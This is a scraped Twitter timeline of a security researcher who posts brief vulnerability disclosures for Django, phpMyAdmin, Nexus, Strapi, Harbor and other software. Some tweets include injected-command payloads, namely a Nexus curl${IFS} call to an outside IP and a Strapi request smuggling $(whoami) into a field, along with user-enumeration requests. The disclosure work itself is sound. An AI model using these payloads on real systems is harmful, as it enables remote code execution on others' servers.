Twitter | Pretraživanje | |
Tweetovi
Henry Chen 11 h
the citrix offer a tool to check CVE-2019-19781 if ("[global]") and ("encrypt passwords") and ("name resolve order") in str(response): => if True and True and ("name resolve order") in str(response): 🤔🤔🤔
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 3. velj
CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. FIX:
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 16. sij
CVE-2020-2551 WebLogic RCE via IIOP protocol.
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 16. sij
Odgovor korisniku/ci @pyn3rd
;)工作不饱和
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 15. sij
Odgovor korisniku/ci @D0rkerDevil
Authenticated
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 15. sij
CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page fix:
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 10. sij
find a "new" way to get JDBC Deserialization RCE and it doesn't need any interceptor .
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 3. sij
after digging deep into this commit you will find it's actually a XSS... more details: related issue:
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 2. sij
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that uses the `toBSON` method however there are lots of no-auth mongo-express ... shodan: poc:
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 29. pro
Apereo Cas 4.2.X Remote Code Execution.(execution =xxx_ZXlKaGJH...):GIF👇 and about the Apereo Cas 4.1.X Remote Code Execution.(execution =xxx_AAAAIg...): Thanks
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 10. pro
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 9. pro
CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 CVE-2019-5475
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 9. pro
Odgovor korisniku/ci @700_isnuoT @test
👀?
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 8. pro
Odgovor korisniku/ci @ZeddYu_Lu
👍
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 6. pro
CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 5. pro
Odgovor korisniku/ci @0c0c0f
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 4. pro
CVE-2019-3990 User Enumeration Vulnerability GET /api/users/search?email=.com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 4. pro
Harbor Security Update: 1. Privilege Escalation 2. CVE-2019-19029 SQL Injection via user-groups 3. CVE-2019-19026 SQL Injection via project quotas 4. CVE-2019-19025 Missing CSRF protection 5. CVE-2019-3990 User Enumeration Vulnerability
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 4. pro
CVE-2019-5096 GoAhead web server code execution vulnerability : An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5.
Reply Retweet Označi sa "sviđa mi se"
Henry Chen 2. pro
CVE-2019-19118: Privilege escalation in the Django admin.
Reply Retweet Označi sa "sviđa mi se"